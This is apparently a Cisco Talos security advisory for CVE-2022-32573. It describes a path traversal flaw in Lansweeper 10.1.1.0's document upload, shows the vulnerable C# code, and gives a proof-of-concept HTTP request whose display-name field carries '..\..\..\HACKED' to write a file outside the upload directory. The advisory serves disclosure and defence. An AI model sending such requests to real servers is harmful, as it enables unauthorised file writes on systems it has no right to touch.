CVE-2022-32573
A directory traversal vulnerability exists in the AssetActions.aspx addDoc functionality of Lansweeper lansweeper 10.1.1.0. A specially-crafted HTTP request can lead to arbitrary file upload. An attacker can send an HTTP request to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Lansweeper lansweeper 10.1.1.0
lansweeper - https://www.lansweeper.com/
9.9 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
CWE-22 - Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
Lansweeper is an IT Asset Management solution that gathers hardware and software information of computers and other devices on a computer network for management, compliance and audit purposes.
An exploitable directory traversal vulnerability is related with an action: Assets -> choose any asset -> Docs -> Add document
and is located inside the \LS\WS\AssetActions.cs
file.
Let us take a close look at the vulnerable source code :
Line 1 else if (page.IsPostBack && current.Request["action"] == "addDoc")
Line 2 {
Line 3
Line 4 if (fileup.PostedFile != null && fileup.PostedFile.ContentLength > 0)
Line 5 {
Line 6 string text5 = Path.GetFileName(fileup.PostedFile.FileName);
Line 7 string text6 = Guid.NewGuid().ToString();
Line 8 int value6 = int.Parse(current.Request["assetId"]);
Line 9 string item = DateTime.Now.ToString(User.Current().DateTimeFormat);
Line 10 WebUser webUser2 = (WebUser)current.Session["Webuser"];
Line 11 string text7 = ((!webUser2.IsAuthenticated) ? webUser2.Displayname : (webUser2.UserDomain + "\\" + webUser2.UserName));
Line 12 string[] allowedExtensions = General.AllowedExtensions;
Line 13 string text8 = Path.GetExtension(fileup.FileName).ToLower();
Line 14 if (txtdocname.Text != "")
Line 15 {
Line 16 text5 = txtdocname.Text + text8;
Line 17 }
Line 18 bool flag = false;
Line 19 string[] array = allowedExtensions;
Line 20 for (int i = 0; i < array.Length; i++)
Line 21 {
Line 22 if (array[i] == text8)
Line 23 {
Line 24 flag = true;
Line 25 }
Line 26 }
Line 27 string text9 = HttpContext.Current.Server.MapPath("~") + "\\DOCS\\";
Line 28 string filename = text9 + text6 + "_" + text5;
Line 29 if (!Directory.Exists(text9))
Line 30 {
Line 31 Directory.CreateDirectory(text9);
Line 32 }
Line 33 try
Line 34 {
Line 35 if (!flag)
Line 36 {
Line 37 text4 = text4 + "file extension ('" + text8 + "') is not allowed.";
Line 38 throw new CustomException(text4);
Line 39 }
Line 40 fileup.PostedFile.SaveAs(filename);
Uploading a file (document), an attacker can use the txtdocname
(Display name
in web GUI) variable to provide an alternative filename which is not sanitized at all in a context of directory traversal.
Next, that name is concatenated in a simple way with a path to DOCS
directory lines 27-28
.
Lack of proper txtdocname
sanitization allows an attacker to upload a file to an arbitrary destination within the file system.
REQUEST
POST /AssetActions.aspx?action=addDoc&assetId=10 HTTP/1.1
Host: 192.168.0.102:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------23614898975253108242957970650
Content-Length: 644
Origin: http://192.168.0.102:81
Connection: close
Referer: http://192.168.0.102:81/AssetActions.aspx?action=addDoc&assetId=10
Cookie: UserSettings=language=1; ASP.NET_SessionId=etcnsycpe3rytjmue2efl5co; custauth=username=hacker&userdomain=; __RequestVerificationToken_Lw__=zP2evPOU4gLNF/pF3R1XPsIP7ceImHsHKoqy7GfYwDnIwHnDJKt3r5+0bFTXNS/XpEAiyEFBVT2ekfSLIPgVMULtvi8Ae4qLSYcUO0UH90vcERUKMi72E3I2yEJexWSyNKlA8gcXlfMPYbc0a94Dji44b2cNn4aS0KGOSUQBn/0=
Upgrade-Insecure-Requests: 1
-----------------------------23614898975253108242957970650
Content-Disposition: form-data; name="__VIEWSTATE"
-----------------------------23614898975253108242957970650
Content-Disposition: form-data; name="fileup"; filename="doc_name_ppt.magicext.ini"
Content-Type: application/vnd.ms-powerpoint
ATTACKER CONTROLED CONTENT
-----------------------------23614898975253108242957970650
Content-Disposition: form-data; name="txtdocname"
..\..\..\HACKED
-----------------------------23614898975253108242957970650
Content-Disposition: form-data; name="btnOK"
Upload
-----------------------------23614898975253108242957970650--
RESPONSE
HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/8.0
x-frame-options: SAMEORIGIN
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 06 Jun 2022 14:53:18 GMT
Connection: close
Content-Length: 159
<script>window.parent.closeIframe(["10","..\\..\\..\\HACKED.ini","6405c669-95ed-4469-bb1a-ae4665868d1a","..\\Unauthenticated","06/06/2022 16:53:18"]);</script>
2022-06-27 - Vendor Disclosure
2022-11-29 - Vendor Patch Release
2022-12-01 - Public Release
Discovered by Marcin 'Icewall' Noga of Cisco Talos.